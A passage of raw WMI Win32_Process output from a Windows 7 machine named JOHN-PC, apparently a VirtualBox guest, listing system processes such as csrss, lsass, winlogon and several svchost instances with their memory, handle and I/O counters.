Win32_ComputerSystem\nCSName : JOHN-PC\nDescription : smss.exe\nExecutablePath :\nExecutionState :\nHandle : 272\nHandleCount : 29\nInstallDate :\nKernelModeTime : 600864\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : smss.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows 7 Ultimate |C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 318\nOtherTransferCount : 8646\nPageFaults : 293\nPageFileUsage : 216\nParentProcessId : 4\nPeakPageFileUsage : 268\nPeakVirtualSize : 17027072\nPeakWorkingSetSize : 720\nPriority : 11\nPrivatePageCount : 221184\nProcessId : 272\nQuotaNonPagedPoolUsage : 1\nQuotaPagedPoolUsage : 8\nQuotaPeakNonPagedPoolUsage : 5\nQuotaPeakPagedPoolUsage : 20\nReadOperationCount : 12\nReadTransferCount : 29214\nSessionId : 0\nStatus :\nTerminationDate :\nThreadCount : 2\nUserModeTime : 0\nVirtualSize : 4145152\nWindowsVersion : 6.1.7600\nWorkingSetSize : 532480\nWriteOperationCount : 5\nWriteTransferCount : 20\nPSComputerName : JOHN-PC\nProcessName : smss.exe\nHandles : 29\nVM : 4145152\nWS : 532480\nPath :\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"348\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : JOHN-PC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\JOHN-PC\\root\\cimv2:Win32_Process.Handle=\"348\"\nCaption : csrss.exe\nCommandLine : %SystemRoot%\\system32\\csrss.exe ObjectDirectory=\\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1\n ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16\nCreationClassName : Win32_Process\nCreationDate : 20170712122328.577300-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : JOHN-PC\nDescription : csrss.exe\nExecutablePath : C:\\Windows\\system32\\csrss.exe\nExecutionState :\nHandle : 348\nHandleCount : 370\nInstallDate :\nKernelModeTime : 1502160\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : csrss.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows 7 Ultimate |C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 1996\nOtherTransferCount : 93042\nPageFaults : 1636\nPageFileUsage : 1116\nParentProcessId : 340\nPeakPageFileUsage : 1116\nPeakVirtualSize : 34533376\nPeakWorkingSetSize : 2688\nPriority : 13\nPrivatePageCount : 1142784\nProcessId : 348\nQuotaNonPagedPoolUsage : 5\nQuotaPagedPoolUsage : 56\nQuotaPeakNonPagedPoolUsage : 9\nQuotaPeakPagedPoolUsage : 58\nReadOperationCount : 182\nReadTransferCount : 144624\nSessionId : 0\nStatus :\nTerminationDate :\nThreadCount : 8\nUserModeTime : 400576\nVirtualSize : 34271232\nWindowsVersion : 6.1.7600\nWorkingSetSize : 2179072\nWriteOperationCount : 0\nWriteTransferCount : 0\nPSComputerName : JOHN-PC\nProcessName : csrss.exe\nHandles : 370\nVM : 34271232\nWS : 2179072\nPath : C:\\Windows\\system32\\csrss.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"396\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : JOHN-PC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\JOHN-PC\\root\\cimv2:Win32_Process.Handle=\"396\"\nCaption : wininit.exe\nCommandLine : wininit.exe\nCreationClassName : Win32_Process\nCreationDate : 20170712122328.627372-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : JOHN-PC\nDescription : wininit.exe\nExecutablePath : C:\\Windows\\system32\\wininit.exe\nExecutionState :\nHandle : 396\nHandleCount : 74\nInstallDate :\nKernelModeTime : 801152\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : wininit.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows 7 Ultimate |C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 719\nOtherTransferCount : 3906\nPageFaults : 1051\nPageFileUsage : 784\nParentProcessId : 340\nPeakPageFileUsage : 928\nPeakVirtualSize : 49909760\nPeakWorkingSetSize : 3208\nPriority : 13\nPrivatePageCount : 802816\nProcessId : 396\nQuotaNonPagedPoolUsage : 5\nQuotaPagedPoolUsage : 42\nQuotaPeakNonPagedPoolUsage : 7\nQuotaPeakPagedPoolUsage : 51\nReadOperationCount : 1\nReadTransferCount : 5632\nSessionId : 0\nStatus :\nTerminationDate :\nThreadCount : 3\nUserModeTime : 0\nVirtualSize : 34000896\nWindowsVersion : 6.1.7600\nWorkingSetSize : 2568192\nWriteOperationCount : 0\nWriteTransferCount : 0\nPSComputerName : JOHN-PC\nProcessName : wininit.exe\nHandles : 74\nVM : 34000896\nWS : 2568192\nPath : C:\\Windows\\system32\\wininit.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"404\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : JOHN-PC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\JOHN-PC\\root\\cimv2:Win32_Process.Handle=\"404\"\nCaption : csrss.exe\nCommandLine : %SystemRoot%\\system32\\csrss.exe ObjectDirectory=\\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1\n ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16\nCreationClassName : Win32_Process\nCreationDate : 20170712122328.627372-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : JOHN-PC\nDescription : csrss.exe\nExecutablePath : C:\\Windows\\system32\\csrss.exe\nExecutionState :\nHandle : 404\nHandleCount : 221\nInstallDate :\nKernelModeTime : 5307632\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : csrss.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows 7 Ultimate |C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 2622\nOtherTransferCount : 33872\nPageFaults : 20109\nPageFileUsage : 1272\nParentProcessId : 388\nPeakPageFileUsage : 1404\nPeakVirtualSize : 239112192\nPeakWorkingSetSize : 11168\nPriority : 13\nPrivatePageCount : 1302528\nProcessId : 404\nQuotaNonPagedPoolUsage : 9\nQuotaPagedPoolUsage : 115\nQuotaPeakNonPagedPoolUsage : 14\nQuotaPeakPagedPoolUsage : 239\nReadOperationCount : 9108\nReadTransferCount : 482433\nSessionId : 1\nStatus :\nTerminationDate :\nThreadCount : 9\nUserModeTime : 1301872\nVirtualSize : 107212800\nWindowsVersion : 6.1.7600\nWorkingSetSize : 2985984\nWriteOperationCount : 0\nWriteTransferCount : 0\nPSComputerName : JOHN-PC\nProcessName : csrss.exe\nHandles : 221\nVM : 107212800\nWS : 2985984\nPath : C:\\Windows\\system32\\csrss.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"444\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : JOHN-PC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\JOHN-PC\\root\\cimv2:Win32_Process.Handle=\"444\"\nCaption : winlogon.exe\nCommandLine : winlogon.exe\nCreationClassName : Win32_Process\nCreationDate : 20170712122328.707488-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : JOHN-PC\nDescription : winlogon.exe\nExecutablePath : C:\\Windows\\system32\\winlogon.exe\nExecutionState :\nHandle : 444\nHandleCount : 112\nInstallDate :\nKernelModeTime : 1301872\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : winlogon.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows 7 Ultimate |C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 1197\nOtherTransferCount : 6288\nPageFaults : 3096\nPageFileUsage : 1492\nParentProcessId : 388\nPeakPageFileUsage : 2776\nPeakVirtualSize : 51965952\nPeakWorkingSetSize : 6028\nPriority : 13\nPrivatePageCount : 1527808\nProcessId : 444\nQuotaNonPagedPoolUsage : 5\nQuotaPagedPoolUsage : 40\nQuotaPeakNonPagedPoolUsage : 11\nQuotaPeakPagedPoolUsage : 52\nReadOperationCount : 3\nReadTransferCount : 5776\nSessionId : 1\nStatus :\nTerminationDate :\nThreadCount : 3\nUserModeTime : 600864\nVirtualSize : 40443904\nWindowsVersion : 6.1.7600\nWorkingSetSize : 3280896\nWriteOperationCount : 0\nWriteTransferCount : 0\nPSComputerName : JOHN-PC\nProcessName : winlogon.exe\nHandles : 112\nVM : 40443904\nWS : 3280896\nPath : C:\\Windows\\system32\\winlogon.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"488\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : JOHN-PC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\JOHN-PC\\root\\cimv2:Win32_Process.Handle=\"488\"\nCaption : services.exe\nCommandLine : C:\\Windows\\system32\\services.exe\nCreationClassName : Win32_Process\nCreationDate : 20170712122328.777588-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : JOHN-PC\nDescription : services.exe\nExecutablePath : C:\\Windows\\system32\\services.exe\nExecutionState :\nHandle : 488\nHandleCount : 194\nInstallDate :\nKernelModeTime : 8412096\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : services.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows 7 Ultimate |C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 2999\nOtherTransferCount : 420188\nPageFaults : 6561\nPageFileUsage : 4460\nParentProcessId : 396\nPeakPageFileUsage : 7296\nPeakVirtualSize : 40091648\nPeakWorkingSetSize : 9768\nPriority : 9\nPrivatePageCount : 4567040\nProcessId : 488\nQuotaNonPagedPoolUsage : 8\nQuotaPagedPoolUsage : 27\nQuotaPeakNonPagedPoolUsage : 16\nQuotaPeakPagedPoolUsage : 32\nReadOperationCount : 117\nReadTransferCount : 500876\nSessionId : 0\nStatus :\nTerminationDate :\nThreadCount : 8\nUserModeTime : 1702448\nVirtualSize : 35315712\nWindowsVersion : 6.1.7600\nWorkingSetSize : 4816896\nWriteOperationCount : 973\nWriteTransferCount : 3821996\nPSComputerName : JOHN-PC\nProcessName : services.exe\nHandles : 194\nVM : 35315712\nWS : 4816896\nPath : C:\\Windows\\system32\\services.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"496\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : JOHN-PC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\JOHN-PC\\root\\cimv2:Win32_Process.Handle=\"496\"\nCaption : lsass.exe\nCommandLine : C:\\Windows\\system32\\lsass.exe\nCreationClassName : Win32_Process\nCreationDate : 20170712122328.807632-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : JOHN-PC\nDescription : lsass.exe\nExecutablePath : C:\\Windows\\system32\\lsass.exe\nExecutionState :\nHandle : 496\nHandleCount : 800\nInstallDate :\nKernelModeTime : 8311952\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : lsass.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows 7 Ultimate |C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 5618\nOtherTransferCount : 583732\nPageFaults : 3438\nPageFileUsage : 3120\nParentProcessId : 396\nPeakPageFileUsage : 3120\nPeakVirtualSize : 34959360\nPeakWorkingSetSize : 7556\nPriority : 9\nPrivatePageCount : 3194880\nProcessId : 496\nQuotaNonPagedPoolUsage : 15\nQuotaPagedPoolUsage : 50\nQuotaPeakNonPagedPoolUsage : 16\nQuotaPeakPagedPoolUsage : 50\nReadOperationCount : 1713\nReadTransferCount : 109701\nSessionId : 0\nStatus :\nTerminationDate :\nThreadCount : 11\nUserModeTime : 8011520\nVirtualSize : 34435072\nWindowsVersion : 6.1.7600\nWorkingSetSize : 7110656\nWriteOperationCount : 1470\nWriteTransferCount : 138645\nPSComputerName : JOHN-PC\nProcessName : lsass.exe\nHandles : 800\nVM : 34435072\nWS : 7110656\nPath : C:\\Windows\\system32\\lsass.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"504\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : JOHN-PC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\JOHN-PC\\root\\cimv2:Win32_Process.Handle=\"504\"\nCaption : lsm.exe\nCommandLine : C:\\Windows\\system32\\lsm.exe\nCreationClassName : Win32_Process\nCreationDate : 20170712122328.807632-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : JOHN-PC\nDescription : lsm.exe\nExecutablePath : C:\\Windows\\system32\\lsm.exe\nExecutionState :\nHandle : 504\nHandleCount : 200\nInstallDate :\nKernelModeTime : 200288\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : lsm.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows 7 Ultimate |C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 133\nOtherTransferCount : 560\nPageFaults : 4457\nPageFileUsage : 1648\nParentProcessId : 396\nPeakPageFileUsage : 1648\nPeakVirtualSize : 24059904\nPeakWorkingSetSize : 3924\nPriority : 8\nPrivatePageCount : 1687552\nProcessId : 504\nQuotaNonPagedPoolUsage : 5\nQuotaPagedPoolUsage : 25\nQuotaPeakNonPagedPoolUsage : 6\nQuotaPeakPagedPoolUsage : 25\nReadOperationCount : 0\nReadTransferCount : 0\nSessionId : 0\nStatus :\nTerminationDate :\nThreadCount : 11\nUserModeTime : 901296\nVirtualSize : 23797760\nWindowsVersion : 6.1.7600\nWorkingSetSize : 3575808\nWriteOperationCount : 0\nWriteTransferCount : 0\nPSComputerName : JOHN-PC\nProcessName : lsm.exe\nHandles : 200\nVM : 23797760\nWS : 3575808\nPath : C:\\Windows\\system32\\lsm.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"608\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : JOHN-PC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\JOHN-PC\\root\\cimv2:Win32_Process.Handle=\"608\"\nCaption : svchost.exe\nCommandLine : C:\\Windows\\system32\\svchost.exe -k DcomLaunch\nCreationClassName : Win32_Process\nCreationDate : 20170712122329.378452-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : JOHN-PC\nDescription : svchost.exe\nExecutablePath : C:\\Windows\\system32\\svchost.exe\nExecutionState :\nHandle : 608\nHandleCount : 353\nInstallDate :\nKernelModeTime : 8111664\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : svchost.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows 7 Ultimate |C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 29613\nOtherTransferCount : 530904\nPageFaults : 67578\nPageFileUsage : 3020\nParentProcessId : 488\nPeakPageFileUsage : 3020\nPeakVirtualSize : 40407040\nPeakWorkingSetSize : 6016\nPriority : 8\nPrivatePageCount : 3092480\nProcessId : 608\nQuotaNonPagedPoolUsage : 7\nQuotaPagedPoolUsage : 36\nQuotaPeakNonPagedPoolUsage : 13\nQuotaPeakPagedPoolUsage : 39\nReadOperationCount : 0\nReadTransferCount : 0\nSessionId : 0\nStatus :\nTerminationDate :\nThreadCount : 10\nUserModeTime : 3404896\nVirtualSize : 36839424\nWindowsVersion : 6.1.7600\nWorkingSetSize : 6021120\nWriteOperationCount : 0\nWriteTransferCount : 0\nPSComputerName : JOHN-PC\nProcessName : svchost.exe\nHandles : 353\nVM : 36839424\nWS : 6021120\nPath : C:\\Windows\\system32\\svchost.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"668\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : JOHN-PC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\JOHN-PC\\root\\cimv2:Win32_Process.Handle=\"668\"\nCaption : VBoxService.exe\nCommandLine : C:\\Windows\\System32\\VBoxService.exe\nCreationClassName : Win32_Process\nCreationDate : 20170712122329.568726-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : JOHN-PC\nDescription : VBoxService.exe\nExecutablePath : C:\\Windows\\System32\\VBoxService.exe\nExecutionState :\nHandle : 668\nHandleCount : 118\nInstallDate :\nKernelModeTime : 3605184\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : VBoxService.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows 7 Ultimate |C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 174313\nOtherTransferCount : 4164921\nPageFaults : 48385\nPageFileUsage : 2344\nParentProcessId : 488\nPeakPageFileUsage : 2352\nPeakVirtualSize : 46714880\nPeakWorkingSetSize : 3876\nPriority : 8\nPrivatePageCount : 2400256\nProcessId : 668\nQuotaNonPagedPoolUsage : 5\nQuotaPagedPoolUsage : 36\nQuotaPeakNonPagedPoolUsage : 6\nQuotaPeakPagedPoolUsage : 37\nReadOperationCount : 4047\nReadTransferCount : 16188\nSessionId : 0\nStatus :\nTerminationDate :\nThreadCount : 12\nUserModeTime : 1201728\nVirtualSize : 46706688\nWindowsVersion : 6.1.7600\nWorkingSetSize : 3919872\nWriteOperationCount : 4047\nWriteTransferCount : 64752\nPSComputerName : JOHN-PC\nProcessName : VBoxService.exe\nHandles : 118\nVM : 46706688\nWS : 3919872\nPath : C:\\Windows\\System32\\VBoxService.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"720\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : JOHN-PC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\JOHN-PC\\root\\cimv2:Win32_Process.Handle=\"720\"\nCaption : svchost.exe\nCommandLine : C:\\Windows\\system32\\svchost.exe -k RPCSS\nCreationClassName : Win32_Process\nCreationDate : 20170712122329.739972-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : JOHN-PC\nDescription : svchost.exe\nExecutablePath : C:\\Windows\\system32\\svchost.exe\nExecutionState :\nHandle : 720\nHandleCount : 273\nInstallDate :\nKernelModeTime : 3605184\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : svchost.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows 7 Ultimate |C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 322\nOtherTransferCount : 15508\nPageFaults : 3747\nPageFileUsage : 3140\nParentProcessId : 488\nPeakPageFileUsage : 3140\nPeakVirtualSize : 29499392\nPeakWorkingSetSize : 5388\nPriority : 8\nPrivatePageCount : 3215360\nProcessId : 720\nQuotaNonPagedPoolUsage : 10\nQuotaPagedPoolUsage : 40\nQuotaPeakNonPagedPoolUsage : 10\nQuotaPeakPagedPoolUsage : 41\nReadOperationCount : 0\nReadTransferCount : 0\nSessionId : 0\nStatus :\nTerminationDate :\nThreadCount : 8\nUserModeTime : 6909936\nVirtualSize : 29499392\nWindowsVersion : 6.1.7600\nWorkingSetSize : 5517312\nWriteOperationCount : 0\nWriteTransferCount : 0\nPSComputerName : JOHN-PC\nProcessName : svchost.exe\nHandles : 273\nVM : 29499392\nWS : 5517312\nPath : C:\\Windows\\system32\\svchost.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"772\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : JOHN-PC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\JOHN-PC\\root\\cimv2:Win32_Process.Handle=\"772\"\nCaption : svchost.exe\nCommandLine : C:\\Windows\\System32\\svchost.exe -k LocalServiceNetworkRestricted\nCreationClassName : Win32_Process\nCreationDate : 20170712122329.795051-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : JOHN-PC\nDescription : svchost.exe\nExecutablePath : C:\\Windows\\System32\\svchost.exe\nExecutionState :\nHandle : 772\nHandleCount : 564\nInstallDate :\nKernelModeTime : 6208928\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : svchost.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows 7 Ultimate |C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 3507\nOtherTransferCount : 95164\nPageFaults : 8131\nPageFileUsage : 13912\nParentProcessId : 488\nPeakPageFileUsage : 14620\nPeakVirtualSize : 84037632\nPeakWorkingSetSize : 12680\nPriority : 8\nPrivatePageCount : 14245888\nProcessId : 772\nQuotaNonPagedPoolUsage : 13\nQuotaPagedPoolUsage : 72\nQuotaPeakNonPagedPoolUsage : 16\nQuotaPeakPagedPoolUsage : 76\nReadOperationCount : 269\nReadTransferCount : 5796459\nSessionId : 0\nStatus :\nTerminationDate :\nThreadCount : 21\nUserModeTime : 3805472\nVirtualSize : 79962112\nWindowsVersion : 6.1.7600\nWorkingSetSize : 10862592\nWriteOperationCount : 629\nWriteTransferCount : 1781499\nPSComputerName : JOHN-PC\nProcessName : svchost.exe\nHandles : 564\nVM : 79962112\nWS : 10862592\nPath : C:\\Windows\\System32\\svchost.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"900\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : JOHN-PC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\JOHN-PC\\root\\cimv2:Win32_Process.Handle=\"900\"\nCaption : svchost.exe\nCommandLine : C:\\Windows\\System32\\svchost.exe -k LocalSystemNetworkRestricted\nCreationClassName : Win32_Process\nCreationDate : 20170712122330.290762-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : JOHN-PC\nDescription : svchost.exe\nExecutablePath : C:\\Windows\\System32\\svchost.exe\nExecutionState :\nHandle : 900\nHandleCount : 502\nInstallDate :\nKernelModeTime : 56781648\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : svchost.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows 7 Ultimate |C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 157709\nOtherTransferCount : 6589070\nPageFaults : 53228\nPageFileUsage : 31136\nParentProcessId : 488\nPeakPageFileUsage : 36328\nPeakVirtualSize : 112607232\nPeakWorkingSetSize : 39640\nPriority : 8\nPrivatePageCount : 31883264\nProcessId : 900\nQuotaNonPagedPoolUsage : 13\nQuotaPagedPoolUsage : 79\nQuotaPeakNonPagedPoolUsage : 15\nQuotaPeakPagedPoolUsage : 82\nReadOperationCount : 777\nReadTransferCount : 16290731\nSessionId : 0\nStatus :\nTerminationDate :\nThreadCount : 24\nUserModeTime : 79714624\nVirtualSize : 107683840\nWindowsVersion : 6.1.7600\nWorkingSetSize : 32575488\nWriteOperationCount : 17711\nWriteTransferCount : 6508584\nPSComputerName : JOHN-PC\nProcessName : svchost.exe\nHandles : 502\nVM : 107683840\nWS : 32575488\nPath : C:\\Windows\\System32\\svchost.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"940\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : JOHN-PC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\JOHN-PC\\root\\cimv2:Win32_Process.Handle=\"940\"\nCaption : svchost.exe\nCommandLine : C:\\Windows\\system32\\svchost.exe -k netsvcs\nCreationClassName : Win32_Process\nCreationDate : 20170712122330.356857-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : JOHN-PC\nDescription : svchost.exe\nExecutablePath : C:\\Windows\\system32\\svchost.exe\nExecutionState :\nHandle : 940\nHandleCount : 1401\nInstallDate :\nKernelModeTime : 147912688\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : svchost.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows 7 Ultimate |C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 876271\nOtherTransferCount : 249422697\nPageFaults : 278297\nPageFileUsage : 24528\nParentProcessId : 488\nPeakPageFileUsage : 105120\nPeakVirtualSize : 234819584\nPeakWorkingSetSize : 90176\nPriority : 8\nPrivatePageCount : 25116672\nProcessId : 940\nQuotaNonPagedPoolUsage : 35\nQuotaPagedPoolUsage : 132\nQuotaPeakNonPagedPoolUsage : 140\nQuotaPeakPagedPoolUsage : 173\nReadOperationCount : 150899\nReadTransferCount : 614189472\nSessionId : 0\nStatus :\nTerminationDate :\nThreadCount : 48\nUserModeTime : 108055376\nVirtualSize : 164155392\nWindowsVersion : 6.1.7600\nWorkingSetSize : 21028864\nWriteOperationCount : 7077\nWriteTransferCount : 393943192\nPSComputerName : JOHN-PC\nProcessName : svchost.exe\nHandles : 1401\nVM : 164155392\nWS : 21028864\nPath : C:\\Windows\\system32\\svchost.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"1108\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : JOHN-PC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\JOHN-PC\\root\\cimv2:Win32_Process.Handle=\"1108\"\nCaption : svchost.exe\nCommandLine : C:\\Windows\\system32\\svchost.exe -k LocalService\nCreationClassName : Win32_Process\nCreationDate : 20170712122330.665299-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : JOHN-PC\nDescription : svchost.exe\nExecutablePath : C:\\Windows\\system32\\svchost.exe\nExecutionState :\nHandle : 1108\nHandleCount : 498\nInstallDate :\nKernelModeTime : 5708208\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : svchost.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows 7 Ultimate |C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 13888\nOtherTransferCount : 523968\nPageFaults : 7285\nPageFileUsage : 6252\nParentProcessId : 488\nPeakPageFileUsage : 6940\nPeakVirtualSize : 64761856\nPeakWorkingSetSize : 10784\nPriority : 8\nPrivatePageCount : 6402048\nProcessId : 1108\nQuotaNonPagedPoolUsage : 19\nQuotaPagedPoolUsage : 61\nQuotaPeakNonPagedPoolUsage : 24\nQuotaPeakPagedPoolUsage : 66\nReadOperationCount : 310\nReadTransferCount : 183135\nSessionId : 0\nStatus :\nTerminationDate :\nThreadCount : 21\nUserModeTime : 4907056\nVirtualSize : 55312384\nWindowsVersion : 6.1.7600\nWorkingSetSize : 9084928\nWriteOperationCount : 42\nWriteTransferCount : 2452\nPSComputerName : JOHN-PC\nProcessName : svchost.exe\nHandles : 498\nVM : 55312384\nWS : 9084928\nPath : C:\\Windows\\system32\\svchost.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"1240\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : JOHN-PC\n__NAMESPACE : root\\cimv2\n__PATH : 